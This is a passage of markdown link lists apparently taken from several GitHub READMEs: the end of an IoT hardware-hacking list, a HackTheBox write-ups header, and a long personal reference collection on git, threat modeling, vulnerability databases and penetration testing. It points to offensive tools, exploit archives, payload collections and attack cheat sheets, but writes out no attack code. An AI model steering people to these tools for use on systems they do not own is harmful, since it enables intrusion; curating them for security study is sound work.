Adapter](https://www.ebay.in/itm/Ultra-Mini-Bluetooth-CSR-4-0-USB-Dongle-Adapter-Black-Golden-with-2-yr-wrnty-/332302813975) - [Attify Badge - UART, JTAG, SPI, I2C (w/ headers)](https://www.attify-store.com/products/attify-badge-assess-security-of-iot-devices) ## Hardware Interfaces - [Serial Terminal Basics](https://learn.sparkfun.com/tutorials/terminal-basics/all) - [Reverse Engineering Serial Ports](http://www.devttys0.com/2012/11/reverse-engineering-serial-ports/) ### UART - [Identifying UART interface](https://www.mikroe.com/blog/uart-serial-communication) - [onewire-over-uart](https://github.com/dword1511/onewire-over-uart) - [Accessing sensor via UART](http://home.wlu.edu/~levys/courses/csci250s2017/SensorsSignalsSerialSockets.pdf) ### JTAG - [Identifying JTAG interface](https://blog.senr.io/blog/jtag-explained) - [NAND Glitching Attack](http://www.brettlischalk.com/posts/nand-glitching-wink-hub-for-root)
# HackTheBox Writeups for HackTheBox machines https://www.hackthebox.eu/ You can find me here on twitter if you need help: https://twitter.com/electronicbots
references ========== Remember: *If you're not paying for it, you're the product.* and "[Things can be different...](https://earthrights.co.uk/2020/12/23/lets-not-waste-this-moment/)" >"However the future unfolds, it's not something to be predicted, like the passage of a comet. It's something we build." *[by Robert Kunzig - behind a National Geographic paywall](https://www.nationalgeographic.com/magazine/article/lets-not-waste-this-crucial-moment-we-need-to-stop-abusing-the-planet-feature)* Collection of reusable references Hosted at: [https://mccright.github.io/references/](https://mccright.github.io/references/) ### [Putin's war](https://en.wikipedia.org/wiki/Russo-Ukrainian_War): * Don't ignore it. See: [Putin's war in Ukraine](https://github.com/mccright/rand-notes/blob/master/Putins-war-in-Ukraine.md) ### Back to the References * The *time changed* again recently... See how [NIST explains daylight saving time](https://www.nist.gov/pml/time-and-frequency-division/local-time-faqs) * Try the genuine ChatGPT here: [https://chat.openai.com/chat](https://chat.openai.com/chat) (*there are look-alike scams*). It is impressive technology. When used with sensitivity and care it can materially enhance productivity in many roles. [ChatGPT](https://chat.openai.com/auth/login) can be unavailable during peak hours. * Flex your perceptions and imagination with the Astronomy Photo of the Day [https://apod.nasa.gov/apod/astropix.html](https://apod.nasa.gov/apod/astropix.html) or see what is new from the James Webb Space Telescope [https://webbtelescope.org/news/news-releases](https://webbtelescope.org/news/news-releases) [*[or their Flicker collection](https://www.flickr.com/photos/nasawebbtelescope/albums)*] or read at length from NASA's ebook collection [https://www.nasa.gov/connect/ebooks/index.html](https://www.nasa.gov/connect/ebooks/index.html) or explore the Apollo Lunar Surface Journal [high-tech from a different age] [https://www.hq.nasa.gov/alsj/main.html](https://www.hq.nasa.gov/alsj/main.html) * Flex your perceptions and imagination with a *real-time* visualization of global marine shipping [https://www.marinetraffic.com/en/ais/home/centerx:80.5/centery:8.7/zoom:3](https://www.marinetraffic.com/en/ais/home/centerx:80.5/centery:8.7/zoom:3) * Here is the "NASA JPL Asteroid Watch --> The Next Five Asteroid Approaches" [https://www.jpl.nasa.gov/asteroid-watch/next-five-approaches](https://www.jpl.nasa.gov/asteroid-watch/next-five-approaches) to help fuel your "it's always something..." catastrophe habit * Begin [or continue] to work individually and collectively to slow climate change. Little of what we do is relevant in a world destablized by climate change. * We need to act on many, many fronts, but there are some offenders that deserve special attention. For example, please *[Treat Big Oil and Big Ag Like Big Tobacco](https://github.com/mccright/rand-notes/blob/master/Climate-Resources.md#treat-big-oil-and-big-ag-like-big-tobacco)* * I have begun to accumulate links to some of my climate reading (*and planned reading*) in another repository [https://github.com/mccright/rand-notes/blob/master/Climate-Resources.md](https://github.com/mccright/rand-notes/blob/master/Climate-Resources.md) * Find something new/different to read: [https://books.google.com/](https://books.google.com/?hl=en&tab=pp) * Explore these falsehoods (*too many*) programmers believe in (*which too often produce errors at runtime*) -- Awesome Falsehood [https://github.com/kdeldycke/awesome-falsehood](https://github.com/kdeldycke/awesome-falsehood) * Or, if you are needing a break from your normal grind, join others doing people-powered research [https://www.zooniverse.org/projects?page=1&status=live](https://www.zooniverse.org/projects?page=1&status=live) * Writing well is difficult. The Strunkifier may help [*think 'Strunk and White' from school written in PHP with a web front end*][http://vinoisnotouzo.com/strunkifier/](http://vinoisnotouzo.com/strunkifier/) and the source at [https://github.com/BSVino/Strunkifier/blob/master/strunkify.php](https://github.com/BSVino/Strunkifier/blob/master/strunkify.php) * Remember the *Ten simple rules for making research software more robust* [https://journals.plos.org/ploscompbiol/article?id=10.1371/journal.pcbi.1005412](https://journals.plos.org/ploscompbiol/article?id=10.1371/journal.pcbi.1005412) * If you work in a corporate environment, ensure it is supporting open source: * "Why have an open source program office?." RedHat Brief, Last Updated: 4 February 2021 [https://www.redhat.com/en/resources/open-source-program-office-brief](https://www.redhat.com/en/resources/open-source-program-office-brief) * "What does an open source program office do?" By Brian Proffitt, 19 December 2019 [https://www.redhat.com/en/blog/what-does-open-source-program-office-do](https://www.redhat.com/en/blog/what-does-open-source-program-office-do) * "Creating an Open Source Program." By Chris Aniszczyk, COO, Cloud Native Computing Foundation; Jeff McAffer, Director, Open Source Programs Office, Microsoft; Will Norris, Open Source Office Manager, Google; and Andrew Spyker, Container Cloud Manager, Netflix. [https://www.linuxfoundation.org/tools/creating-an-open-source-program/](https://www.linuxfoundation.org/tools/creating-an-open-source-program/) * "Open source best practices for the enterprise." (A collection of 12 best practices guides for running an open source program office or starting an open source project in your organization. Developed by The Linux Foundation in partnership with the TODO Group, these resources represent the experience of our [Linux Foundation] staff, projects, and members.) [https://www.linuxfoundation.org/resources/open-source-guides/](https://www.linuxfoundation.org/resources/open-source-guides/) * "A guide to setting up your Open Source Program Office (OSPO) for success -- Learn how to best grow and maintain your open source communities and allies." By J. Manrique Lopez de la Fuente, 08 May 2020 [https://opensource.com/article/20/5/open-source-program-office](https://opensource.com/article/20/5/open-source-program-office) * "Software Licenses in Plain English -- Lookup popular software licenses summarized at-a-glance." [https://tldrlegal.com/](https://tldrlegal.com/) * Finally, pay attention to where you invest your attention. A [recent essay](https://www.nytimes.com/2022/08/07/opinion/media-message-twitter-instagram.html) by Ezra Klein exploring how technology choices influence how/what we learn and behave is worth a careful read: [https://www.nytimes.com/2022/08/07/opinion/media-message-twitter-instagram.html](https://www.nytimes.com/2022/08/07/opinion/media-message-twitter-instagram.html). ### Cheat Sheets First and foremost: a couple **git cheat sheets** * [https://training.github.com/downloads/github-git-cheat-sheet.pdf](https://training.github.com/downloads/github-git-cheat-sheet.pdf) * and TimGreen's list of git & github features -- with a table of resources and books at the bottom: [https://github.com/tiimgreen/github-cheat-sheet](https://github.com/tiimgreen/github-cheat-sheet) maybe also * Michael Gieson's git cheat cheet [https://www.gieson.com/Library/cheatsheets/md.html?git](https://www.gieson.com/Library/cheatsheets/md.html?git) * "The simple guide" [http://rogerdudler.github.io/git-guide/](http://rogerdudler.github.io/git-guide/) and * [https://github.com/vineetpandey/github-cheat-sheet](https://github.com/vineetpandey/github-cheat-sheet) and page 2 of * [http://www.git-tower.com/blog/git-cheat-sheet/](http://www.git-tower.com/blog/git-cheat-sheet/) and documenation at [http://git-scm.com/docs](http://git-scm.com/docs) * Git Pocket Guide. By Richard E. Silverman [https://www.oreilly.com/library/view/git-pocket-guide/9781449327507/](https://www.oreilly.com/library/view/git-pocket-guide/9781449327507/) * [Monorepos](https://en.wikipedia.org/wiki/Monorepo) can hide a lot of different problems. [git-sizer](https://github.com/github/git-sizer) can help. git-sizer computes various size metrics for a local Git repository, flagging those that might cause you problems or inconvenience. * Finally, git repos may contain sensitive files and the scale of their history can slow pipeline activities. In some use cases [git-filter-repo](https://github.com/newren/git-filter-repo) can help. Just get started... **git remote -v** (view the full addresses of your configured remotes) cd into your new project directory **git init** (builds a .git directory that contains all the metadata and repository history) **git add .** (instructs Git to begin tracking all files within and beneath the current directory) **git commit –m'This is the first commit'** (creates the permanent history of all files, with the -m option supplying a message alongside the history marker) * or install Joel Parker Henderson's [GitAlias](https://www.gitalias.com/) and do the same more efficiently. Rename your old github repo ['master' branch to 'main'](https://github.com/mccright/rand-notes/blob/master/OffensiveTechTerms.md)... ```shell git branch -m master main git fetch origin git branch -u origin/main main git remote set-head origin -a ``` ### Tell Me About * A github profile summary: [https://profile-summary-for-github.com/user/<githubUserName>/](https://profile-summary-for-github.com/user/githubUserName/) [Thank you tipsy](https://github.com/tipsy/profile-summary-for-github) ### Awesome-Awesome * A curated list of awesome lists: [https://github.com/sindresorhus/awesome](https://github.com/sindresorhus/awesome) * A collection of awesome lists for hackers, pentesters & security researchers [https://github.com/Hack-with-Github/Awesome-Hacking](https://github.com/Hack-with-Github/Awesome-Hacking) * A curated list of Terminal frameworks, plugins & resources for CLI lovers [https://github.com/k4m4/terminals-are-sexy](https://github.com/k4m4/terminals-are-sexy) ### Browse** Sears catalog of Linux software -- Awesome Linux Software [https://github.com/luongvo209/Awesome-Linux-Software](https://github.com/luongvo209/Awesome-Linux-Software) * and if you need a little Linux help using it [https://gto76.github.io/linux-cheatsheet/](https://gto76.github.io/linux-cheatsheet/) and [https://github.com/gto76/linux-cheatsheet](https://github.com/gto76/linux-cheatsheet) ### Manage Your Privacy * Daniel Roesler's excellent Privacy Checklist: [https://github.com/diafygi/privacy-checklist](https://github.com/diafygi/privacy-checklist) * 11 tips for protecting your privacy... by Olivia Martin [https://freedom.press/training/blog/11-tips-protecting-your-privacy-and-digital-security-age-trump/](https://freedom.press/training/blog/11-tips-protecting-your-privacy-and-digital-security-age-trump/) * Your IP address is sometimes your identity [https://myexternalip.com/](https://myexternalip.com/) ### Software Vulnerability Detection Resources * *DevSecOps* tool lists [https://github.com/hahwul/DevSecOps](https://github.com/hahwul/DevSecOps) * U.S. National Checklist Program [http://checklists.nist.gov](http://checklists.nist.gov) and [https://web.nvd.nist.gov/view/ncp/repository](https://web.nvd.nist.gov/view/ncp/repository) * Security Content Automation Protocol (SCAP) * Nist Overview: [http://csrc.nist.gov/groups/SMA/forum/documents/august2015/forum-august2015-booth.pdf](http://csrc.nist.gov/groups/SMA/forum/documents/august2015/forum-august2015-booth.pdf) * SCAP Home: [http://scap.nist.gov/](http://scap.nist.gov/) * State-of-the-Art Resources (SOAR) for Software Vulnerability Detection, Test, and Evaluation [https://apps.dtic.mil/sti/pdfs/AD1106086.pdf](https://apps.dtic.mil/sti/pdfs/AD1106086.pdf) * State-of-the-Art Resources (SOAR) for Software Assurance [http://people.cs.ksu.edu/~hatcliff/890-High-Assurance/Reading/IATAC-SOAR-Software-Security-Assurance.pdf](http://people.cs.ksu.edu/~hatcliff/890-High-Assurance/Reading/IATAC-SOAR-Software-Security-Assurance.pdf) * Common Vulnerability Scoring System (CVSS) [http://cve.mitre.org/](http://cve.mitre.org/) and [https://nvd.nist.gov/cvss.cfm?calculator&adv&version=2](https://nvd.nist.gov/cvss.cfm?calculator&adv&version=2) * Vulnerability and exploit lists: o [https://www.cisa.gov/known-exploited-vulnerabilities-catalog](https://www.cisa.gov/known-exploited-vulnerabilities-catalog) o [http://cve.mitre.org/](http://cve.mitre.org/) o [http://www.cvedetails.com/](http://www.cvedetails.com/) o [http://w.0day.today/](http://w.0day.today/) o [http://www.securityfocus.com/bid/](http://www.securityfocus.com/bid/) o [https://www.exploit-db.com/](https://www.exploit-db.com/) o [https://nvd.nist.gov/](https://nvd.nist.gov/) * Library for interacting with Synack API [https://github.com/abdilahrf/synackAPI](https://github.com/abdilahrf/synackAPI) * CyberSecurityMalaysia, 3rd Party Information Security Assessment Guideline [https://www.cybersecurity.my/data/content_files/11/650.pdf](https://www.cybersecurity.my/data/content_files/11/650.pdf) * Fortify Taxonomy of Secure Software Errors. [https://vulncat.fortify.com/en](https://vulncat.fortify.com/en) * Or host your own list to keep your research more private: o A free and open vulnerabilities database and the packages they impact. And the tools to aggregate and correlate these vulnerabilities. [https://github.com/nexB/vulnerablecode](https://github.com/nexB/vulnerablecode) o Vulnerabilities and Attacks [https://github.com/hannob/vulns](https://github.com/hannob/vulns) o The CVE-Search Project [https://www.cve-search.org/software/](https://www.cve-search.org/software/), and cve-search - a tool to perform local searches for known vulnerabilities [https://github.com/cve-search/cve-search](https://github.com/cve-search/cve-search) * Scripts to help run Fortify -- and other code assessment tools -- in your Amazon cloud [https://github.com/awslabs/one-line-scan/](https://github.com/awslabs/one-line-scan/) * There are situations where you may be given a repository without any accompanying information... What is in the repo?? *[crazymax](https://crazymax.dev/)* assembled a Docker image -- [crazymax/docker-linguist](https://github.com/crazy-max/docker-linguist) -- that runs [GitHub Linguist](https://github.com/github/linguist), a library used on GitHub.com to detect blob languages. You can use is to easily, quickly and *reasonable accurately* identify what languages are used in a given local repository. Here are some examples of it in use: [https://github.com/mccright/FortifyStuff/blob/master/Developer-Access-to-Static-Analysis-Data.md#what-languages-are-in-a-given-target-repository](https://github.com/mccright/FortifyStuff/blob/master/Developer-Access-to-Static-Analysis-Data.md#what-languages-are-in-a-given-target-repository) * Vulns: Vulnerability scanner for Linux/FreeBSD, agent-less, written in Go. [https://github.com/future-architect/vuls](https://github.com/future-architect/vuls) ### Architecture Risk Analysis * BSIMM Definitions of Architecture Risk Analysis - Builds an ARA definition by describing a set of increasingly mature risk analysis practices: [https://www.bsimm.com/framework/software-security-development-lifecycle/architecture-analysis/ ](https://www.bsimm.com/framework/software-security-development-lifecycle/architecture-analysis/) * U.S. CERT Definition & Best Practices Document on Architecture Risk Analysis: [https://www.us-cert.gov/bsi/articles/best-practices/architectural-risk-analysis/architectural-risk-analysis](https://www.us-cert.gov/bsi/articles/best-practices/architectural-risk-analysis/architectural-risk-analysis) * Lecture 28: Threat Modeling, or Architectural Risk Analysis - Coursera-hosted lecture on this topic by Michael Hicks, University of Maryland, College Park: [https://www.coursera.org/learn/software-security/lecture/bQAoU/threat-modeling-or-architectural-risk-analysis](https://www.coursera.org/learn/software-security/lecture/bQAoU/threat-modeling-or-architectural-risk-analysis) * "A Non-Trivial Task of Introducing Architecture Risk Analysis into Software Development Process." OWASP EU presentation by Denis Pilipchuk, Global Product Security, Oracle: [http://2014.appsec.eu/wp-content/uploads/2014/07/Denis.Pilipchuk-A-non-trivial-task-of-Introducing-Architecture-Risk-Analysis-into-the-Software-Development-Process.pdf](http://2014.appsec.eu/wp-content/uploads/2014/07/Denis.Pilipchuk-A-non-trivial-task-of-Introducing-Architecture-Risk-Analysis-into-the-Software-Development-Process.pdf) * Mitre Att&ck Enterprise threat list [https://mitre.github.io/attack-navigator/enterprise/](https://mitre.github.io/attack-navigator/enterprise/) "ATT&CK® is a catalog of techniques and tactics that describe post-compromise adversary behavior on typical enterprise IT environments. The core use cases involve using the catalog to analyze, triage, compare, describe, relate, and share post-compromise adversary behavior." * Mitre D3FEND™ technical knowledge base of defensive countermeasures for common offensive techniques that is complementary to MITRE's ATT&CK, a knowledge base of cyber adversary behavior. D3FEND complements Mitre Att&ck by establishing a terminology of computer network defensive techniques and illuminating previously-unspecified relationships between defensive and offensive methods. [https://d3fend.mitre.org/](https://d3fend.mitre.org/) * Related works: * MITRE ATT&CK® Matrix for Enterprise -- with specialized versions for the following platforms: Windows, macOS, Linux, PRE, Azure AD, Office 365, Google Workspace, SaaS, IaaS, Network, Containers [https://attack.mitre.org/matrices/enterprise/](https://attack.mitre.org/matrices/enterprise/) * MITRE ATT&CK® Matrix for Mobile -- with specialized versions for the following platforms: Android and iOS [https://attack.mitre.org/matrices/mobile/](https://attack.mitre.org/matrices/mobile/) * NIST 800-53 Controls to ATT&CK Mappings [https://ctid.mitre-engenuity.org/our-work/nist-800-53-control-mappings/](https://ctid.mitre-engenuity.org/our-work/nist-800-53-control-mappings/) * Mitre ATT&CK® for Industrial Control Systems threat list [https://collaborate.mitre.org/attackics/index.php/Main_Page](https://collaborate.mitre.org/attackics/index.php/Main_Page) "ATT&CK for ICS is a knowledge base useful for describing the actions an adversary may take while operating within an ICS network. The knowledge base can be used to better characterize and describe post-compromise adversary behavior." * MITRE ATT&CK® and CAPEC™ datasets expressed in STIX 2.0 [https://github.com/mitre/cti](https://github.com/mitre/cti) * Github organization for MITRE ATT&CK [https://github.com/mitre-attack](https://github.com/mitre-attack) * Atomic Red Team™ is a library of tests mapped to the MITRE ATT&CK® framework. Its mission is to help security teams quickly, portably, and reproducibly test their environments [https://github.com/redcanaryco/atomic-red-team](https://github.com/redcanaryco/atomic-red-team) * *infosecn1nja's* Awesome Mitre ATT&CK™ Framework [https://github.com/infosecn1nja/awesome-mitre-attack](https://github.com/infosecn1nja/awesome-mitre-attack) * The Common Attack Pattern Enumeration and Classification dictionary and classification taxonomy (CAPEC): Understanding how the adversary operates is essential to effective cyber security. CAPEC™ helps by providing a comprehensive dictionary of known patterns of attacks employed by adversaries to exploit known weaknesses in cyber-enabled capabilities. It can be used by analysts, developers, testers, and educators to advance community understanding and enhance defenses. * Focuses on application security * Enumerates exploits against vulnerable systems * Includes social engineering / supply chain * Associated with Common Weakness Enumeration (CWE) [http://capec.mitre.org/data/](http://capec.mitre.org/data/) * Example Attack Taxonomy from CAPEC [http://capec.mitre.org/data/definitions/2000.html](http://capec.mitre.org/data/definitions/2000.html) * "The STRIDE Threat Model." [http://msdn.microsoft.com/en-US/library/ee823878(v=cs.20).aspx](http://msdn.microsoft.com/en-US/library/ee823878(v=cs.20).aspx) * "Improving Web Application Security: Chapter 3, Threat Modeling -- Threats and Countermeasures." [http://msdn.microsoft.com/en-us/library/ff648644.aspx](http://msdn.microsoft.com/en-us/library/ff648644.aspx) (In depth review of STRIDE and DREAD.) * NIST's SP 800-160 Vol. 1 Rev. 1 (2022) "Engineering Trustworthy Secure Systems." With special attention to the 30 security principles in "Appendix E. Principles for Trustworthy Secure Design." [https://csrc.nist.gov/publications/detail/sp/800-160/vol-1-rev-1/final](https://csrc.nist.gov/publications/detail/sp/800-160/vol-1-rev-1/final) * "How To: Create a Threat Model for a Web Application at Design Time." [http://msdn.microsoft.com/en-us/library/ms978527.aspx](http://msdn.microsoft.com/en-us/library/ms978527.aspx) * "Walkthrough: Creating a Threat Model for a Web Application." [http://msdn.microsoft.com/en-us/library/ms978538.aspx](http://msdn.microsoft.com/en-us/library/ms978538.aspx) * "Application Threat Modeling (OWASP)" [https://www.owasp.org/index.php/Application_Threat_Modeling](https://www.owasp.org/index.php/Application_Threat_Modeling) * "Threat Modeling Cheat Sheet (OWASP)" [https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Threat_Modeling_Cheat_Sheet.md](https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/Threat_Modeling_Cheat_Sheet.md) * "OWASP Risk Rating Methodology" [https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology](https://www.owasp.org/index.php/OWASP_Risk_Rating_Methodology) * "A Complete Guide to the Common Vulnerability Scoring System Version 3.1" [https://www.first.org/cvss/v3-1/cvss-v31-specification_r1.pdf](https://www.first.org/cvss/v3-1/cvss-v31-specification_r1.pdf) * The System Design Primer [https://github.com/donnemartin/system-design-primer](https://github.com/donnemartin/system-design-primer) ### Web Application Vulnerability Analysis and Pen Testing * List of awesome penetration testing resources, tools and other shiny things [https://github.com/enaqx/awesome-pentest](https://github.com/enaqx/awesome-pentest) * Awesome collection of hacking tools [https://github.com/jekil/awesome-hacking](https://github.com/jekil/awesome-hacking) * ```Kitsec```, a toolkit CLI to help simplify and centralize your risk eval. workflow [https://github.com/kitsec-labs/kitsec-core](https://github.com/kitsec-labs/kitsec-core) * "All in One Hacking tool For Hackers" [https://github.com/Z4nzu/hackingtool](https://github.com/Z4nzu/hackingtool) * Arsenal - an inventory, reminder and launcher to simplify the use of all the hard-to-remember pentest commands [https://github.com/Orange-Cyberdefense/arsenal](https://github.com/Orange-Cyberdefense/arsenal) * Red Teaming Toolkit [https://github.com/infosecn1nja/Red-Teaming-Toolkit](https://github.com/infosecn1nja/Red-Teaming-Toolkit) * Red Team Scripts [https://github.com/infosecn1nja/red-team-scripts](https://github.com/infosecn1nja/red-team-scripts) * bugcrowd / methodology-taxonomy [https://github.com/bugcrowd/methodology-taxonomy](https://github.com/bugcrowd/methodology-taxonomy) * Bugcrowd Vulnerability Rating Taxonomy (VRT) [https://bugcrowd.com/vulnerability-rating-taxonomy](https://bugcrowd.com/vulnerability-rating-taxonomy) and [https://github.com/bugcrowd/vulnerability-rating-taxonomy](https://github.com/bugcrowd/vulnerability-rating-taxonomy) * "*A collection of tools used by Web hackers*" [https://github.com/hahwul/WebHackersWeapons](https://github.com/hahwul/WebHackersWeapons) * six2dez pentest-book [https://pentestbook.six2dez.com/](https://pentestbook.six2dez.com/) and the source at [https://github.com/six2dez/pentest-book](https://github.com/six2dez/pentest-book) * If you are creative and persistent, you will accumulate valuable passwords and tokens. Keep them safe from abuse. Assuming that need support for Linux, Windows, or Mac, you might consider using [KeePassXC](https://keepassxc.org/) on an encrypted+password protected USB drive. See the [recent code review report](https://molotnikov.de/keepassxc-review) by [Zaur Molotnikov](https://molotnikov.de/cv) to help evaluate the risks. * Penetration Testing Checklist [https://github.com/infinite-omicron/pentesting-checklist](https://github.com/infinite-omicron/pentesting-checklist) and its companion Pentesting Guide [https://github.com/infinite-omicron/pentesting-guide/](https://github.com/infinite-omicron/pentesting-guide/) * Automated NoSQL database enumeration and web application exploitation tool [https://github.com/codingo/NoSQLMap](https://github.com/codingo/NoSQLMap) * An eccentric collection of links to pen testing resources [https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE](https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE) * The Open Penetration Testing Bookmarks Collection [https://github.com/Oweoqi/pentest-bookmarks/blob/master/BookmarksList.md](https://github.com/Oweoqi/pentest-bookmarks/blob/master/BookmarksList.md) * Collection of pentest resources [https://github.com/1N3/](https://github.com/1N3/) * Active Directory Attack Cheat Sheet [https://medium.com/@dw3113r/active-directory-attack-cheat-sheet-ea9e9744028d](https://medium.com/@dw3113r/active-directory-attack-cheat-sheet-ea9e9744028d) or formatted better at [https://dw3113r.com/2022/07/20/active-directory-attack-cheat-sheet/](https://dw3113r.com/2022/07/20/active-directory-attack-cheat-sheet/) * Active Directory Cheatsheet: [https://github.com/OriolOriolOriol/Active-Directory-Cheat-Sheet](https://github.com/OriolOriolOriol/Active-Directory-Cheat-Sheet) * Active Directory Kill Chain Attack & Defense [https://github.com/infosecn1nja/AD-Attack-Defense](https://github.com/infosecn1nja/AD-Attack-Defense) * OWASP Web Application Security Testing Cheatsheet [https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet](https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet) * [ngrok](https://ngrok.com): ngrok is a globally distributed reverse proxy fronting your web services running on a given endpoint, or in any cloud or private network. *Paid [ngrok](https://ngrok.com/pricing)* has additional features that support its promotion as "the programmable network edge that adds connectivity, security, and observability to your apps with no code changes." Pay attention to the details of every request. The free version may not be suitable for your business, your local environment, or your regulators/investors/customers. [https://ngrok.com](https://ngrok.com) * Weird Proxies: a cheat sheet about behaviour of various reverse proxies, cache proxies, load balancers, etc. [https://github.com/GrrrDog/weird_proxies](https://github.com/GrrrDog/weird_proxies) * Fetch a list of currently-working proxies [https://github.com/stamparm/fetch-some-proxies](https://github.com/stamparm/fetch-some-proxies) * Collection of security tool cheat sheets [https://github.com/gnebbia/cheatsheets/tree/master/sectool](https://github.com/gnebbia/cheatsheets/tree/master/sectool) * OWASP based Web Application Security Testing Checklist as an Excel Workbook [https://github.com/tanprathan/OWASP-Testing-Checklist](https://github.com/tanprathan/OWASP-Testing-Checklist) * Web Application Security Guide/Checklist. [https://en.wikibooks.org/wiki/Web_Application_Security_Guide/Checklist](https://en.wikibooks.org/wiki/Web_Application_Security_Guide/Checklist) * Awesome WAF [https://github.com/0xInfection/Awesome-WAF](https://github.com/0xInfection/Awesome-WAF) * identYwaf is a WAF protection type identification tool using *loud* techniques [https://github.com/stamparm/identYwaf](https://github.com/stamparm/identYwaf) * Open Source Security Testing Methodology Manual (OSSTMM) [http://www.isecom.org/research/osstmm.html](http://www.isecom.org/research/osstmm.html) * Session Hijacking Cheat Sheet [http://resources.infosecinstitute.com/session-hijacking-cheat-sheet/](http://resources.infosecinstitute.com/session-hijacking-cheat-sheet/) * SecLists is the security tester's companion. It is a collection of multiple types of lists used during security assessments. List types include usernames, passwords, URLs, sensitive data grep strings, fuzzing payloads, and many more. [https://github.com/danielmiessler/SecLists](https://github.com/danielmiessler/SecLists) * Pen testing payloads with supporting resources (*this could/should be named 'awsome-payloads'!*) [https://github.com/swisskyrepo/PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings) and, easier to navigate [https://swisskyrepo.github.io/PayloadsAllTheThings/](https://swisskyrepo.github.io/PayloadsAllTheThings/) * Penetration Testers Framework (PTF) [https://github.com/trustedsec/ptf](https://github.com/trustedsec/ptf) * Social-Engineer Toolkit (SET) [https://github.com/trustedsec/social-engineer-toolkit](https://github.com/trustedsec/social-engineer-toolkit) * A Python based web application scanner - BlackWidow - with Docker help [https://github.com/1N3/BlackWidow](https://github.com/1N3/BlackWidow) * Sn1per - Automated pentest framework for offensive security experts [https://github.com/1N3/Sn1per](https://github.com/1N3/Sn1per) * Arachni Web Application Security Scanner Framework {Ruby centric} [http://www.arachni-scanner.com/](http://www.arachni-scanner.com/) * Sn1per is an automated scanner {php} to enumerate and scan for vulnerabilities [https://github.com/1N3/Sn1per](https://github.com/1N3/Sn1per) * WhatWeb - Next generation web scanner [https://github.com/urbanadventurer/WhatWeb](https://github.com/urbanadventurer/WhatWeb) * Cloudflare's in-house lightweight network vulnerability scanner [https://blog.cloudflare.com/introducing-flan-scan/](https://blog.cloudflare.com/introducing-flan-scan/) and [https://github.com/cloudflare/flan](https://github.com/cloudflare/flan) * OWASP-Nettacker - Automated Penetration Testing Framework [https://github.com/zdresearch/OWASP-Nettacker](https://github.com/zdresearch/OWASP-Nettacker) * Some starter scripts to (*help*) set up a clean Windows 10 endpoint: [https://github.com/Hecsall/clean-windows](https://github.com/Hecsall/clean-windows) * windows-privesc-check - Security Auditing Tool For Windows [https://code.google.com/archive/p/windows-privesc-check/source/default/source](https://code.google.com/archive/p/windows-privesc-check/source/default/source) and [https://github.com/1N3/PrivEsc/blob/master/windows/windows-privesc-check/windows-privesc-check.py](https://github.com/1N3/PrivEsc/blob/master/windows/windows-privesc-check/windows-privesc-check.py) * [http://securitywing.com/63-web-application-security-checklist-auditors-developers/](http://securitywing.com/63-web-application-security-checklist-auditors-developers/) (very high level) * Website fingerprint script [https://github.com/bgiarrizzo/website-fingerprint](https://github.com/bgiarrizzo/website-fingerprint) * Awesome Mainframe Hacking/Pentesting Resources.[https://github.com/samanL33T/Awesome-Mainframe-Hacking/](https://github.com/samanL33T/Awesome-Mainframe-Hacking/) * Excellent list of open source tools for AWS security: defensive, offensive, auditing, DFIR, etc. [https://github.com/toniblyx/my-arsenal-of-aws-security-tools](https://github.com/toniblyx/my-arsenal-of-aws-security-tools) * Audit and secure your AWS environment(s): [YATAS](https://github.com/padok-team/yatas) "is a simple and easy to use tool to audit your infrastructure for misconfiguration or potential security issues." ..."The goal of YATAS is to help you create a secure AWS environment without too much hassle." [https://github.com/padok-team/yatas](https://github.com/padok-team/yatas) and [https://www.primates.dev/aws-security-misconfiguration-audit-in-30-seconds/](https://www.primates.dev/aws-security-misconfiguration-audit-in-30-seconds/) * AWS is a gigantic ecosystem. There may be opportunities that you are not yet aware of: [https://github.com/donnemartin/awesome-aws](https://github.com/donnemartin/awesome-aws) * CloudGoat, Rhino Security Labs' "Vulnerable by Design" AWS deployment tool. [https://github.com/RhinoSecurityLabs/cloudgoat](https://github.com/RhinoSecurityLabs/cloudgoat) * Offensive security testing of your AWS environment [https://github.com/RhinoSecurityLabs/pacu](https://github.com/RhinoSecurityLabs/pacu) * Offensive security testing of your CMS - CMS Detection and Exploitation suite - Scan WordPress, Joomla, Drupal and over 170 other CMSs [https://github.com/Tuhinshubhra/CMSeeK](https://github.com/Tuhinshubhra/CMSeeK) * Tool-X - a kali linux tool installer for Android Termux [https://github.com/rajkumardusad/Tool-X](https://github.com/rajkumardusad/Tool-X) * An interesting study script intended to automate your reconnaissance work [https://github.com/0blio/lazyrecon](https://github.com/0blio/lazyrecon) * Abbreviated vulnerability assessment/recon [https://github.com/jivoi/pentest](https://github.com/jivoi/pentest) * 'domain-scan' A lightweight scan pipeline for orchestrating third party tools, at scale and (optionally) using serverless infrastructure [https://github.com/18F/domain-scan](https://github.com/18F/domain-scan) * Offensive Web Testing Framework (OWTF), is a framework [https://github.com/owtf/owtf](https://github.com/owtf/owtf) * Offensive Web Application Penetration Testing Framework [https://github.com/0xInfection/TIDoS-Framework](https://github.com/0xInfection/TIDoS-Framework) * ReconFTW automates some reconnaisance activities. [https://github.com/six2dez/reconftw](https://github.com/six2dez/reconftw) * Reconnoitre: A reconnaissance tool made for the OSCP labs to automate information gathering and service enumeration whilst creating a directory structure to store results, findings and exploits used for each host, recommended commands to execute and directory structures for storing loot and flags. [https://github.com/codingo/Reconnoitre](https://github.com/codingo/Reconnoitre) * Jenkins Pentesting [https://github.com/gquere/pwn_jenkins](https://github.com/gquere/pwn_jenkins) * Cross Site Request Forgery (CSRF) Audit and Exploitation Toolkit [https://github.com/0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe) * Cross Site Scripting detection suite [https://github.com/s0md3v/XSStrike](https://github.com/s0md3v/XSStrike) * Web Application Firewall Fingerprinting Tool [https://github.com/EnableSecurity/wafw00f](https://github.com/EnableSecurity/wafw00f) * Know your network -- The Ultimate PCAP [https://weberblog.net/the-ultimate-pcap/](https://weberblog.net/the-ultimate-pcap/) * BurpSuite []() * OWASP Zap []() * HUNT Suite is a collection of Burp Suite Pro/Free and OWASP ZAP extensions [https://github.com/bugcrowd/HUNT](https://github.com/bugcrowd/HUNT) * Deploy a 